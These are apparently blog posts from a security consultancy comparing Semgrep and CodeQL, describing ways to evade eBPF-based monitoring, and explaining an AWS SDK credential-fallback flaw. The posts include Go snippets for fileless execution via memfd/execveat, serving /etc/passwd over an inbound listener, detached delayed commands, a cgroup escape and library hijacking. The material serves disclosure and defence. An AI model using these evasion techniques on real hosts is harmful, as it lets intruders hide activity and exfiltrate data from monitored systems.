          - pattern-not: len(...) == $NUM
          #- pattern-not: <... len(...) ...>
          - metavariable-regex:
              metavariable: $SECRET
              regex: .*(secret|password|token|otp|key|signature|nonce).*

The logic in the rules is familiar and amounts to what feels like stacking RegExs, but with the added capability of creating boundaries around what is matched and the benefit of language comprehension. It is important to note, however, that Semgrep lacks an understanding of code flow deep enough to trace source-to-sink paths through complex code. By default it works on a single-file basis, although Beta features add the ability to track across related files. Semgrep’s current capabilities lie somewhere between basic grep and a traditional static code analysis tool with abstract syntax trees and control flow graphs.
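
For illustration, here is a minimal, hypothetical Go handler that the taint rule above would be expected to flag (the handler, the secret variable and its value are made up for this example and are not from any real code base):

package main

import "net/http"

var apiToken = "hypothetical-secret-value" // server-side secret; the name matches the rule's regex

// vulnerableHandler compares user input against a secret with ==, a
// non-constant-time comparison that matches the rule's sink patterns.
func vulnerableHandler(w http.ResponseWriter, r *http.Request) {
	token := r.URL.Query().Get("token") // tainted source: data from *http.Request

	if token == apiToken { // sink: "... == $SECRET", where $SECRET matches .*token.*
		w.Write([]byte("authorized"))
		return
	}
	http.Error(w, "forbidden", http.StatusForbidden)
}

A safe variant would use crypto/subtle.ConstantTimeCompare on the byte representations of the two values, which the sink patterns above would not match.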

No special preparation of repositories is needed before scanning can begin. The tool is fully capable of detecting languages and running simultaneous scans of multiple languages in heterogeneous code repositories. Furthermore, the tool is capable of running on code which isn’t buildable, but the tool will return errors when it parses what it deems as invalid syntax.

That said, rules tend to be more general than the queries in CodeQL and could potentially lead to more false positives. For some situations, it is not possible to make a rule that is completely accurate without customizing the rule to match a specific code base.

CodeQL:

CodeQL’s query language has a SQL-like syntax with the following features:

  • Logical: all the operations in QL are logical operations.
  • Declarative: provide the properties the results must satisfy rather than the procedure to compute the results.
  • Object-oriented: it uses classes, inheritance and other object oriented features to increase modularity and reusability of the code.
  • Read-only: no side effect, no imperative features (ex. variable assignment).

The engine has extractors for each supported language. They are used to extract the information from the codebase into the database. Multi-language code bases are analyzed one language at a time. Trying to specify a list of target languages (go, javascript and c) did not work out of the box, because CodeQL required the build command to be set explicitly for that combination of languages.

CodeQL can also be used as a VS Code extension, a CLI tool, or integrated with GitHub workflows. The VS Code extension allows writing queries with IDE autocompletion support and testing them against one or more previously created databases.

The query below shows how you would search for the same vulnerability as the Semgrep rule above.

/**
 * @name Insecure time comparison for sensitive information
 * @description Input appears to be compared in an insecure manner (timing attacks)
 */


import go

from EqualityTestExpr e, DataFlow::CallNode called
where
  // all the function calls where the argument matches the RegEx
  called
      .getAnArgument()
      .toString()
      .toLowerCase()
      .regexpMatch(".*(secret|password|token|otp|key|signature|nonce).*") and
  e.getAnOperand() = called.getExpr()
select called.getExpr(), "Uses a non-constant time comparison for sensitive information"

In order to create a database, CodeQL requires a buildable codebase. This means that an analysis consists of multiple steps: standard building of the codebase, creating the database and querying the codebase. Due to the complexity of the process in every step, our experience was that a full analysis can require a non-negligible amount of time in some cases.

Writing queries for CodeQL also requires a great amount of effort, especially at the beginning. The user needs to know the CodeQL syntax very well and pay attention to the structure of each condition to avoid killing the performance. We experienced effectively infinite compilation time simply by adding an OR condition to the WHERE clause of a query. Starting from zero experience with the tool, the benefits of using CodeQL are perceivable only in the long run.

Findings workflows

Semgrep:

As Semgrep allows you to output to a number of formats, along with the CLI output, there are a number of ways you can manage the findings. They also list some of this information on their manage-findings page.

CodeQL:

Because the CodeQL CLI tool reports findings in a CSV or SARIF file format, triaging findings reported by it can be quite tedious. During testing, we felt the easiest way to review findings from the CodeQL CLI tool was to launch the query from Visual Studio Code and manually review the results from there (due to the IDE’s navigation features). Ultimately, in real-world usage, the results are probably best consumed through the integration with GitHub.

Scan times

Due to the differences between their approaches, it’s difficult to fairly quantify the differences in speed between the two tools. Semgrep is a clear winner in the time it takes to setup, run a scan and get results. It doesn’t interpret the code as deeply as CodeQL does, nor does it have to create a persistent searchable database, then run queries against it. However, once the database is created, you could argue that querying for a specific bug in CodeQL versus scanning a project again in Semgrep would be roughly similar, depending on multiple factors not directly related to the tools (e.g., hardware, language, code complexity).

This highlights the fact that tool selection criteria should incorporate the use-case.

  • Scanning in a CI/CD pipeline - speed matters more
  • Ongoing periodic scans - speed matters less
  • Time based consulting work - speed is very important

OWASP Benchmark Project results

This section shows the results of using both of these SAST tools to test the same repository of Java code (the only language option). This project’s sample code had been previously reviewed and categorized, specifically to allow for benchmarking of SAST tools. Using this approach we could relatively easily run a head-to-head comparison and allow the OWASP Benchmark Project to score and graph the performance of each tool.

Drawbacks to this approach include the fact that it is one language, Java, and that is not the language of choice for our client. Additionally, SAST tool maintainers, who might be aware of this project, could theoretically ensure their tools perform well in these tests specifically, potentially masking shortcomings when used in broader contexts.

In this test, Semgrep was configured to run with the latest “security-audit” Registry ruleset, per the OWASP Benchmark Project recommendations. CodeQL was run using the “Security-and-quality queries” query suite. The CodeQL query suite includes queries from “security-extended”, plus maintainability and reliability queries.

As you can see from the charts below, Semgrep performed better, on average, than CodeQL did. Examining the rules a bit more closely, we see three CWE (Common Weakness Enumeration) areas where CodeQL does not appear to find any issues, significantly impacting the average performance. It should also be noted that CodeQL does outperform in some categories, but determining the per-category importance is left to the tool’s users.

Semgrep OWASP Benchmark Project results
CodeQL OWASP Benchmark Project results

Cross-tool test suite results

This section discusses the results of using the Semgrep tool against the test cases for CodeQL and vice versa. While this initially seemed like a great way to compare the tools, the test case files unfortunately presented several challenges to the approach. Although labeled “Good” and “Bad”, either in file names or comments, the files were not consistently all “Good” code or all “Bad” code; they were inconsistently mixed, inconsistently labeled, and sometimes contained multiple potential vulnerabilities in the same file. Additionally, we occasionally discovered vulnerabilities in some of the files that were not of the CWE classes the files were supposed to contain (e.g., finding XSS in an SQL Injection test case).

These issues prevented a simple count based on the files that were/were not found to have vulnerabilities. The statistics we present have been modified as much as possible in the allotted time to account for these issues and we have applied data analysis techniques to account for some of the errors.

As you can see in the table below, CodeQL performed significantly better with regards to detection, but at the cost of a higher false positive rate as well. This underscores some of the potential tradeoffs, mentioned in the introduction, which need to be considered by the consumer of the output.

Semgrep/CodeQL cross-tool results

Notes:

  1. Semgrep’s configuration was limited to only running rules classified as security-related and only against Golang files, for efficiency’s sake.

  2. Semgrep successfully identified vulnerabilities associated with CWE-327, CWE-322 and CWE-319

  3. Semgrep’s results only included two vulnerabilities which were the one intended to be found in the file (e.g., test for X find X). The remainder were HTTPs issues (CWE-319) related to servers configured for testing purposes in the CodeQL rules (e.g., test for X but find valid Y instead).

  4. CodeQL rules for SQL injection did not perform well in this case (~20% detection), but did better in cross-site scripting and other tests. There were fewer overall rules available during testing, compared to Semgrep, and vulnerability classes like Server Side Template Injection (SSTI) were not checked for, due to the absence of rules.

  5. Out of 14 files that CodeQL generated findings for, only 2 were analyzed without errors. 85% of files generated some errors during database creation.

  6. False negative rates can increase dramatically if CodeQL fails to extract data from code. It is essential to make sure that there are not excessive extraction errors when creating a database or running any of the commands that implicitly run the extractors.

Client code results

This section discusses the results of using the tools to examine an open source Golang project for one of our clients.

In these tests, due to the aforementioned lack of a priori knowledge of the code’s true security status, we are forced to assume that all files without true positives are free from vulnerabilities (and therefore count as TNs), and likewise that there are no FNs. This underscores why testing against code that has already been classified for evaluation purposes yields more accurate measurements.

Running Semgrep with the “r2c-security-audit” configuration resulted in 15 Golang findings, all of which were true positives. That said, the majority of the findings were related to the use of the unsafe library. Due to the nature of this issue, we opted to count it as only one finding per file, so as not to further skew the results by counting each usage within a file.

As shown in the table below, both tools performed very well! CodeQL detected significantly more findings, but it should be noted that they were largely the same couple of issues across numerous files. In other words, there were repeated code patterns in many cases, skewing the volume of findings.

Semgrep/CodeQL client code results

Notes:

  1. For the purposes of this exercise, TN = Total .go files - TP (890-15) = 875, since we are assuming all those files are free of vulnerabilities. For the Semgrep case, the value is irrelevant for the rate calculations, since no false positives were found.

  2. Semgrep in --config auto mode resulted in thousands of findings when run against our client’s code, as opposed to tens of findings when limiting the scans to security-specific tests on Golang only. We cite this to underscore that results will vary greatly depending on the code tested and the rules applied. That reduction in scope resulted in no false positives among the manually reviewed results.

  3. For CodeQL, approximately 25% of the files were not scanned, due to issues with the tool.

  4. CodeQL encountered many errors during file compilation. 63 out of 74 Go files generated errors while being extracted to CodeQL’s database. This means that the analysis was performed on less data, and most files were only partially analyzed by CodeQL. This caused the CodeQL scan to produce significantly fewer findings than expected.

Conclusion

Obviously there could be some bias but, if you’d like another opinion, the creators of Semgrep have also provided a comparison with CodeQL on their website, particularly in the section: “How is Semgrep different from CodeQL?”.

Not surprisingly, in the end, we still feel Semgrep is a better tool for our use as a security consultancy boutique doing high-quality manual audits. We don’t always have access to all the source code that we’d need to use CodeQL, the process of setting up scans is more laborious and time-consuming in CodeQL, we can manually vet findings ourselves (so a few extra false positives aren’t a major issue for us), and we can use Semgrep for free. If an organization’s use-case is more aligned with our client’s - an organization that is willing to invest the time and effort, is particularly sensitive to false positives (e.g., running a scan during CI/CD) and doesn’t mind paying for the licensing - CodeQL might be a better choice for them.

On Bypassing eBPF Security Monitoring

10 October 2022 at 22:00

There are many security solutions available today that rely on the Extended Berkeley Packet Filter (eBPF) features of the Linux kernel to monitor kernel functions. Such a paradigm shift in the latest monitoring technologies is being driven by a variety of reasons, among them performance needs in an increasingly cloud-dominated world. The Linux kernel always had kernel tracing capabilities such as kprobes (2.6.9), ftrace (2.6.27 and later), perf (2.6.31), or uprobes (3.5), but with BPF it’s finally possible to run kernel-level programs on events and consequently modify the state of the system, without needing to write a kernel module. This has dramatic implications for any attacker looking to compromise a system and go undetected, opening new areas of research and application. Nowadays, eBPF-based programs are used for DDoS mitigations, intrusion detection, container security, and general observability.

In 2021 Teleport introduced a new feature called Enhanced Session Recording to close some monitoring gaps in Teleport’s audit abilities. All issues reported have been promptly fixed, mitigated or documented as described in their public Q4 2021 report. Below you can see an illustration of how we managed to bypass eBPF-based controls, along with some ideas on how red teams or malicious actors could evade these new intrusion detection mechanisms. These techniques can be generally applied to other targets while attempting to bypass any security monitoring solution based on eBPF:

A few words on how eBPF works


eBPF schema

Extended BPF programs are written in a high-level language and compiled into eBPF bytecode using a toolchain. A user mode application loads the bytecode into the kernel using the bpf() syscall, where the eBPF verifier will perform a number of checks to ensure the program is “safe” to run in the kernel. This verification step is critical — eBPF exposes a path for unprivileged users to execute in ring 0. Since allowing unprivileged users to run code in the kernel is a ripe attack surface, several pieces of research in the past focused on local privilege exploitations (LPE), which we won’t cover in this blog post. After the program is loaded, the user mode application attaches the program to a hook point that will trigger the execution when a certain hook point (event) is hit (occurs). The program can also be JIT compiled into native assembly instructions in some cases. User mode applications can interact with, and get data from, the eBPF program running in the kernel using eBPF maps and eBPF helper functions.

Common shortcomings & potential bypasses (here be dragons)

1. Understand which events are caught

While eBPF is fast (much faster than auditd), there are plenty of interesting areas that can’t be reasonably instrumented with BPF due to performance reasons. Depending on what the security monitoring solution wants to protect the most (e.g., network communication vs executions vs filesystem operations), there could be areas where excessive probing could lead to a performance overhead pushing the development team to ignore them. This depends on how the endpoint agent is designed and implemented, so carefully auditing the code security of the eBPF program is paramount.

1.1 Execution bypasses

By way of example, a simple monitoring solution could decide to hook only the execve system call. Contrary to popular belief, multiple ELF-based Unix-like kernels don’t need a file on disk to load and run code, even if they usually require one. One way to achieve this is by using a technique called reflective loading. Reflective loading is an important post-exploitation technique usually used to avoid detection and execute more complex tools in locked-down environments. The man page for execve() states: “execve() executes the program pointed to by filename…”, and goes on to say that “the text, data, bss, and stack of the calling process are overwritten by that of the program loaded”. This overwriting doesn’t necessarily constitute something that the Linux kernel must have a monopoly over, unlike filesystem access, or any number of other things. Because of this, the execve() system call can be mimicked in userland with minimal difficulty. Creating a new process image is therefore a simple matter of:

  • cleaning out the address space;
  • checking for, and loading, the dynamic linker;
  • loading the binary;
  • initializing the stack;
  • determining the entry point and
  • transferring control of execution.

By following these six steps, a new process image can be created and run. Since this technique was initially reported in 2004, the process has been refined and streamlined by off-the-shelf (OTS) post-exploitation tools. As anticipated, an eBPF program hooking execve would not be able to catch this, since a custom userland exec effectively replaces the existing process image within the current address space with a new one. In this, userland exec mimics the behavior of the execve() system call. However, because it operates in userland, the kernel process structures which describe the process image remain unchanged.

Other system calls may go unmonitored and decrease the detection capabilities of the monitoring solution. Some of these are clone, fork, vfork, creat, or execveat.
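
As a concrete sketch of the execveat case, the following Linux-only Go snippet (using golang.org/x/sys/unix; the ./payload.elf path is a placeholder) copies an ELF into an anonymous in-memory file created with memfd_create() and executes it via execveat(AT_EMPTY_PATH). A probe attached only to the execve syscall would not observe this execution:

//go:build linux

package main

import (
	"os"
	"syscall"
	"unsafe"

	"golang.org/x/sys/unix"
)

func main() {
	payload, err := os.ReadFile("./payload.elf") // placeholder ELF binary
	if err != nil {
		panic(err)
	}

	// Anonymous in-memory file; the name is arbitrary and never touches disk.
	fd, err := unix.MemfdCreate("kworker", unix.MFD_CLOEXEC)
	if err != nil {
		panic(err)
	}
	if _, err := unix.Write(fd, payload); err != nil {
		panic(err)
	}

	argv, _ := syscall.SlicePtrFromStrings([]string{"kworker"})
	envv, _ := syscall.SlicePtrFromStrings(os.Environ())
	empty, _ := syscall.BytePtrFromString("")

	// execveat(fd, "", argv, envp, AT_EMPTY_PATH) runs the memfd directly,
	// bypassing a hook placed solely on execve.
	_, _, errno := unix.Syscall6(unix.SYS_EXECVEAT,
		uintptr(fd),
		uintptr(unsafe.Pointer(empty)),
		uintptr(unsafe.Pointer(&argv[0])),
		uintptr(unsafe.Pointer(&envv[0])),
		uintptr(unix.AT_EMPTY_PATH),
		0)
	panic(errno) // only reached if execveat failed
}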

Another potential bypass may be present if the BPF program is naive and trusts the execve syscall argument referencing the complete path of the file that is being executed. An attacker could create symbolic links of Unix binaries in different locations and execute them - thus tampering with the logs.

1.2 Network bypasses

Not hooking all the network-related syscalls can have its own set of problems. Some monitoring solutions may only want to hook the EGRESS traffic, while an attacker could still send data to a non-allowed host abusing other network-sensitive operations (see aa_ops at linux/security/apparmor/include/audit.h:78) related to INGRESS traffic:

  • OP_BIND, the bind() function shall assign a local socket address to a socket identified by descriptor socket that has no local socket address assigned.
  • OP_LISTEN, the listen() function shall mark a connection-mode socket, specified by the socket argument, as accepting connections.
  • OP_ACCEPT, the accept() function shall extract the first connection on the queue of pending connections, create a new socket with the same socket type protocol and address family as the specified socket, and allocate a new file descriptor for that socket.
  • OP_RECVMSG, the recvmsg() function shall receive a message from a connection-mode or connectionless-mode socket.
  • OP_SETSOCKOPT, the setsockopt() function shall set the option specified by the option_name argument, at the protocol level specified by the level argument, to the value pointed to by the option_value argument for the socket associated with the file descriptor specified by the socket argument. Interesting options for attackers are SO_BROADCAST, SO_REUSEADDR, SO_DONTROUTE.

Generally, the network monitoring should look at all socket-based operations similarly to AppArmor.
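
To make the ingress scenario tangible, here is a minimal Go sketch (the port and target file are placeholders): the monitored process only ever calls bind(), listen(), accept() and write(), while the attacker-controlled host initiates the connection to pull the data, so an egress-only hook on connect() sees nothing:

package main

import (
	"net"
	"os"
)

func main() {
	data, err := os.ReadFile("/etc/passwd") // placeholder for the data to exfiltrate
	if err != nil {
		panic(err)
	}

	// bind() + listen() only; no outbound connection is ever made.
	ln, err := net.Listen("tcp", "0.0.0.0:8443")
	if err != nil {
		panic(err)
	}
	conn, err := ln.Accept() // the remote peer connects in
	if err != nil {
		panic(err)
	}
	defer conn.Close()
	conn.Write(data)
}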

In case the same local user has mixed monitored and unmonitored console sessions, it could be possible for an attacker in a monitored session to leverage open file descriptors and sockets to send data to restricted hosts. In 2020, the Linux kernel (5.6) introduced a new system call to achieve this, called pidfd_getfd. A small number of operating systems (like Ubuntu) enable the Yama kernel module, which limits file descriptor access to parent-child process relationships only. A PoC for using this function is available on GitHub (TheZ3ro/fdstealer).

File descriptor stealing using pidfd_getfd

2. Delayed execution

If only active console sessions are monitored, eBPF programs may only live for the time span of the session. By delaying the execution of a command (through sleep, timeout, sar, vmstat, inotifywait, at, cron …) and quitting the session, it could be possible to completely evade the solution.
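
The idea can be sketched in a few lines of Go (the delay and command are placeholders): the process detaches into a new session with setsid() and defers the real command until well after the monitored session, and any session-scoped eBPF programs, are gone. Note that the initial spawn may still be logged; it is the delayed command that escapes the session-bound monitoring:

package main

import (
	"os/exec"
	"syscall"
)

func main() {
	// Detached child in its own session; it survives the console session ending.
	cmd := exec.Command("/bin/sh", "-c", "sleep 3600 && id > /tmp/delayed.out")
	cmd.SysProcAttr = &syscall.SysProcAttr{Setsid: true}
	if err := cmd.Start(); err != nil {
		panic(err)
	}
	// Return immediately and log out; the delayed command runs an hour later.
}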

3. Evade scoped event monitoring based on cgroup

A security monitoring solution may only be interested in auditing a specific user or cgroup (such as in the context of a remote console session). Taking Teleport as an example, it achieves this by correlating every event to a session with control groups (cgroupv2 in particular). Control grouping is a Linux kernel feature to limit access to resources for a group of processes. It is used in many containerization technologies (behind the scenes, Docker creates a set of namespaces and control groups for the container) and its peculiarity is that all child processes will keep the id of the parent process. When Teleport starts an SSH session, it first re-launches itself and places itself within a cgroup. This allows not only that process, but all future processes that Teleport launches, to be tracked with a unique ID. The BPF programs that Teleport runs have been updated to also emit the cgroup ID of the program executing them. The BPF script checks the value returned by bpf_get_current_cgroup_id() and only cares about the important session cgroup. The simplest evasion of this auditing strategy would be changing your cgroup ID, but an attacker needs to be root to achieve this. Meddling with the cgroupv2 pseudo file system or abusing the PAM configuration are also potential opportunities to affect the cgroup/session correlation.

Another technique involves being reallocated by init. In the case of Teleport, when the bash process spawned by the session dies, its child processes become orphans and the Teleport process terminates its execution. When a child process becomes an orphan, it can be assigned to a different cgroup by the operating system under certain conditions (not having a tty, being a process group leader, joining a new process session). This allows an attacker to bypass the restrictions in place. The following PoC is an example of a bypass for this design:

  1. Open a new eBPF-monitored session
  2. Start tmux by executing the tmux command
  3. Detach from tmux by pressing CTRL+B and then D
  4. Kill the bash process that is tmux’s parent
  5. Re-attach to the tmux process by executing tmux attach. The process tree will now look like this:

CGroupV2 evasion PoC

As another attack avenue, leveraging processes run by different local users/cgroupv2 on the machine (abusing other daemons, delegating systemd) can also help an attacker evade this. This aspect obviously depends on the system hosting the monitoring solution. Protecting against this is tricky, since even if PR_SET_CHILD_SUBREAPER is set to ensure that the descendants can’t re-parent themselves to init, if the ancestor reaper dies or is killed (DoS), then processes in that service can escape their cgroup “container”. Any compromise of this privileged service process (or malfeasance by it) allows it to kill its hierarchy manager process and escape all control.

4. Memory limits and loss of events

BPF programs have a lot of constraints. Only 512 bytes of stack space are reserved for the eBPF program. Variables will get hoisted and instantiated at the start of execution, and if the script tries to dump syscall arguments or pt-regs, it will run out of stack space very quickly. If no workaround on the instruction limit is set, it could be possible to push the script into retrieving something too big to ever fit on the stack, losing visibility very soon when the execution gets complicated. But even when workarounds are used (e.g., when using multiple probes to trace the same events but capture different data, or split your code into multiple programs that call each other using a program map) there still may be a chance to abuse it. BPF programs are not meant to be run forever, but they have to stop at some point. By way of example, if a monitoring solution is running on CentOS 7 and trying to capture a process arguments and its environment variables, the emitted event could have too many argv and too many envp. Even in that case, you may miss some of them because the loop stops earlier. In these cases, the event data will be truncated. It’s important to note that these limitations are different based on the kernel where BPF is being run, and how the endpoint agent is written.

Another peculiarity of eBPFs is that they’ll drop events if they can not be consumed fast enough, instead of dragging down the performance of the entire system with it. An attacker could abuse this by generating a sufficient number of events to fill up the perf ringbuffer and overwrite data before the agent can read it.

5. Never trust the userspace

The kernel-space understanding of a pid is not the same as the user-space understanding of a pid. If the eBPF script is trying to identify a file, the right way would be to get the inode number and device number, while a file descriptor won’t be as useful. Even in that case, probes could be subject to TOCTOU issues since they’ll be sending data to user mode that can easily change. If the script is instead tracing syscalls directly (using tracepoint or kprobe) it is probably stuck with file descriptors and it could be possible to obfuscate executions by playing around with the current working directory and file descriptors, (e.g., by combining fchdir, openat, and execveat).

6. Abuse the lack of seccomp-bpf & kernel discrepancies

eBPF-based monitoring solutions should protect themselves by using seccomp-BPF to permanently drop the ability to make the bpf() syscall before spawning a console session. If not, an attacker will have the ability to make the bpf() syscall to unload the eBPF programs used to track execution. Seccomp-BPF uses BPF programs to filter arbitrary system calls and their arguments (constants only, no pointer dereference).
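
A minimal sketch of this hardening step, assuming a Go agent using the libseccomp-golang bindings (github.com/seccomp/libseccomp-golang), could look like the following. It installs a filter that lets every syscall through except bpf(), which is forced to fail with EPERM, before the console session is spawned:

package main

import (
	"golang.org/x/sys/unix"

	seccomp "github.com/seccomp/libseccomp-golang"
)

// dropBPF installs a seccomp filter that denies only the bpf() syscall.
// Once loaded, the filter cannot be removed by the process, so later
// attempts to unload or tamper with the agent's eBPF programs will fail.
func dropBPF() error {
	filter, err := seccomp.NewFilter(seccomp.ActAllow)
	if err != nil {
		return err
	}
	bpfCall, err := seccomp.GetSyscallFromName("bpf")
	if err != nil {
		return err
	}
	if err := filter.AddRule(bpfCall, seccomp.ActErrno.SetReturnCode(int16(unix.EPERM))); err != nil {
		return err
	}
	return filter.Load()
}

func main() {
	if err := dropBPF(); err != nil {
		panic(err)
	}
	// ... spawn the monitored console session here ...
}

Since libseccomp resolves syscall numbers per architecture when generating the filter, it also helps with the calling-convention pitfalls described below.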

Another thing to keep in mind when working with kernels, is that interfaces aren’t guaranteed to be consistent and stable. An attacker may abuse eBPF programs if they are not run on verified kernel versions. Usually, conditional compilation for a different architecture is very convoluted for these programs and you may find that the variant for your specific kernel is not targeted correctly. One common pitfall of using seccomp-BPF is filtering on system call numbers without checking the seccomp_data->arch BPF program argument. This is because on any architecture that supports multiple system call invocation conventions, the system call numbers may vary based on the specific invocation. If the numbers in the different calling conventions overlap, then checks in the filters may be abused. It is therefore important to ensure that the differences in bpf() invocations for each newly supported architecture are taken into account by the seccomp-BPF filter rules.

7. Interfere with the agents

Similarly to (6), it may be possible to interfere with the eBPF program loading in different ways, such as targeting the eBPF compiler libraries (BCC’s libbcc.so) or adapting other shared-library preloading methods to tamper with the behavior of the solution’s legitimate binaries, ultimately performing harmful actions. If an attacker succeeds in altering the solution’s host environment, they can prepend to LD_LIBRARY_PATH a directory where they saved a malicious library that has the same libbcc.so name and exports all the symbols used (to avoid a runtime linkage error). When the solution starts, it gets linked with the malicious library instead of the legitimate bcc one. Defenses against this may include using statically linked programs, linking the library with a full path, or running the program in a controlled environment.

Many thanks to the whole Teleport Security Team, @FridayOrtiz, @Th3Zer0, & @alessandrogario for the inspiration and feedback while writing this blog post.

The Danger of Falling to System Role in AWS SDK Client

17 October 2022 at 22:00

CloudsecTidbit

Introduction to the series

When it comes to Cloud Security, the first questions usually asked are:

  • How is the infrastructure configured?
  • Are there any public buckets?
  • Are the VPC networks isolated?
  • Does it use proper IAM settings?

As application security engineers, we think that there are more interesting and context-related questions such as:

  • Which services provided by the cloud vendor are used?
  • Among the used services, which ones are directly integrated within the web platform logic?
  • How is the web application using such services?
  • How are they combined to support the internal logic?
  • Is the usage of services ever exposed or reachable by the end-user?
  • Are there any unintended behaviors caused by cloud services within the web platform?

By answering these questions, we usually find bugs.

Today we introduce the “CloudSecTidbits” series to share ideas and knowledge about such questions.

CloudSec Tidbits is a blogpost series showcasing interesting bugs found by Doyensec during cloud security testing activities. We’ll focus on times when the cloud infrastructure is properly configured, but the web application fails to use the services correctly.

Each blogpost will discuss a specific vulnerability resulting from an insecure combination of web and cloud related technologies. Every article will include an Infrastructure as Code (IaC) laboratory that can be easily deployed to experiment with the described vulnerability.

Tidbit # 1 - The Danger of Falling to System Role in AWS SDK Client

Amazon Web Services offers a comprehensive SDK to interact with their cloud services.

Let’s first examine how credentials are configured. The AWS SDKs require users to pass access / secret keys in order to authenticate requests to AWS. Credentials can be specified in different ways, depending on the different use cases.

When the AWS client is initialized without directly providing the credential’s source, the AWS SDK acts using a clearly defined logic. The AWS SDK uses a different credential provider chain depending on the base language. The credential provider chain is an ordered list of sources where the AWS SDK will attempt to fetch credentials from. The first provider in the chain that returns credentials without an error will be used.

For example, the SDK for the Go language will use the following chain:

  1. Environment variables
  2. Shared credentials file
  3. If the application uses ECS task definition or RunTask API operation, IAM role for tasks
  4. If the application is running on an Amazon EC2 instance, IAM role for Amazon EC2

The code snippet below shows how the SDK retrieves the first valid credential provider:

Source: aws-sdk-go/aws/credentials/chain_provider.go

// Retrieve returns the credentials value or error if no provider returned
// without error.
//
// If a provider is found it will be cached and any calls to IsExpired()
// will return the expired state of the cached provider.
func (c *ChainProvider) Retrieve() (Value, error) {
	var errs []error
	for _, p := range c.Providers {
		creds, err := p.Retrieve()
		if err == nil {
			c.curr = p
			return creds, nil
		}
		errs = append(errs, err)
	}
	c.curr = nil

	var err error
	err = ErrNoValidProvidersFoundInChain
	if c.VerboseErrors {
		err = awserr.NewBatchError("NoCredentialProviders", "no valid providers in chain", errs)
	}
	return Value{}, err
}

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Insecure AWS SDK Client Initialization In User Facing Functionalities - The Import From S3 Case

By testing several web platforms, we noticed that data import from external cloud services is an often recurring functionality. For example, some web platforms allow data import from third-party cloud storage services (e.g., AWS S3).

In this specific case, we will focus on a vulnerability identified in a web application that was using the AWS SDK for Go (v1) to implement an “Import Data From S3” functionality.

The user was able to make the platform fetch data from S3 by providing the following inputs:

  • S3 bucket name - Import from public source case;

    OR

  • S3 bucket name + AWS Credentials - Import from private source case;

The code paths were handled by a function similar to the following structure:

func getObjectsList(session *session.Session, config *aws.Config, bucket_name string) (*s3.ListObjectsV2Output, error) {

	// initialize or re-initialize the S3 client
	S3svc := s3.New(session, config)

	objectsList, err := S3svc.ListObjectsV2(&s3.ListObjectsV2Input{
		Bucket: aws.String(bucket_name),
	})

	return objectsList, err
}

func importData(req *http.Request) (success bool) {

	srcConfig := &aws.Config{
		Region: &config.Config.AWS.Region,
	}

	req.ParseForm()
	bucket_name := req.Form.Get("bucket_name")
	accessKey := req.Form.Get("access_key")
	secretKey := req.Form.Get("secret_key")
	region := req.Form.Get("region")

	session_init, err := session.NewSession()
	if err != nil {
		return false
	}

	aws_config := &aws.Config{
		Region: aws.String(region),
	}

	if len(accessKey) > 0 {
		aws_config.Credentials = credentials.NewStaticCredentials(accessKey, secretKey, "")
	} else {
		aws_config.Credentials = credentials.AnonymousCredentials
	}

	objectList, err := getObjectsList(session_init, aws_config, bucket_name)

...

Despite using credentials.AnonymousCredentials when the user was not providing keys, the function had an interesting code path when ListObjectsV2 returned errors:

...
if err != nil {
	if _, ok := err.(awserr.Error); ok {
		aws_config.Credentials = nil
		getObjectsList(session_init, aws_config, bucket_name)
	}
}

The error handling was setting aws_config.Credentials = nil and trying again to list the objects in the bucket.

Looking at aws_config.Credentials = nil

Under those circumstances, the credentials provider chain will be used and eventually the instance’s IAM role will be assumed. In our case, the automatically retrieved credentials had full access to internal S3 buckets.

The Simple Deduction

If internal S3 bucket names are exposed to the end-user by the platform (e.g., via network traffic), the user can use them as input for the “import from S3” functionality and inspect their content directly in the UI.

Reading internal bucket names list extracted from Burp Suite history

In fact, it is not uncommon to see internal bucket names in an application’s traffic, as they are often used for internal data processing. In conclusion, providing internal bucket names resulted in their contents being fetched by the import functionality and added to the platform user’s data.

Different Client Credentials Initialization, Different Outcomes

AWS SDK clients require a Session object containing a Credentials object for initialization.

Described below are the three main ways to set the credentials needed by the client:

NewStaticCredentials

Within the credentials package, the NewStaticCredentials function returns a pointer to a new Credentials object wrapping static credentials.

Client initialization example with NewStaticCredentials:

package testing

import (
	"time"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/credentials"
	"github.com/aws/aws-sdk-go/aws/session"
)

var session = session.Must(session.NewSession(&aws.Config{
	Credentials: credentials.NewStaticCredentials("AKIA….", "Secret", "Session"),
	Region:      aws.String("us-east-1"),
}))

Note: The credentials should not be hardcoded in code. Instead retrieve them from a secure vault at runtime.

{ nil | Unspecified } Credentials Object

If the session client is initialized without specifying a credential object, the credential provider chain will be used. Likewise, if the Credentials object is directly initialized to nil, the same behavior will occur.

Client initialization example without Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Region:      aws.String("us-west-2"),
})))

Client initialization example with a nil valued Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Credentials: <nil_object>,
		Region:      aws.String("us-west-2"),
})))

Outcome: Both initialization methods will result in relying on the credential provider chain. Hence, the credentials (probably very privileged) retrieved from the chain will be used. As shown in the aforementioned “Import From S3” case study, not being aware of such behavior led to the exfiltration of internal buckets.

AnonymousCredentials

The right function for the right tasks ;)

AWS SDK for Go API Reference is here to help:

“AnonymousCredentials is an empty Credential object that can be used as dummy placeholder credentials for requests that do not need to be signed. This AnonymousCredentials object can be used to configure a service not to sign requests when making service API calls. For example, when accessing public S3 buckets.”

svc := s3.New(session.Must(session.NewSession(&aws.Config{
  Credentials: credentials.AnonymousCredentials,
})))
// Access public S3 buckets.

Basically, the AnonymousCredentials object is just an empty Credential object:

// source: https://github.com/aws/aws-sdk-go/blob/main/aws/credentials/credentials.go#L60

// AnonymousCredentials is an empty Credential object that can be used as
// dummy placeholder credentials for requests that do not need to be signed.
//
// These Credentials can be used to configure a service not to sign requests
// when making service API calls. For example, when accessing public
// s3 buckets.
//
//     svc := s3.New(session.Must(session.NewSession(&aws.Config{
//       Credentials: credentials.AnonymousCredentials,
//     })))
//     // Access public S3 buckets.
var AnonymousCredentials = NewStaticCredentials("", "", "")

For cloud security auditors

The same class of vulnerability could also be found in the usage of other AWS services.

While auditing cloud-driven web platforms, look for every code path involving an AWS SDK client initialization.

For every code path answer the following questions:

  1. Is the code path directly reachable from an end-user input point (feature or exposed API)?

    e.g., AWS credentials taken from the user settings page within the platform or a user submits an AWS public resource to have it fetched/modified by the platform.

  2. How are the client’s credentials initialized?

    • credential provider chain - Look for the machine owned role in the chain
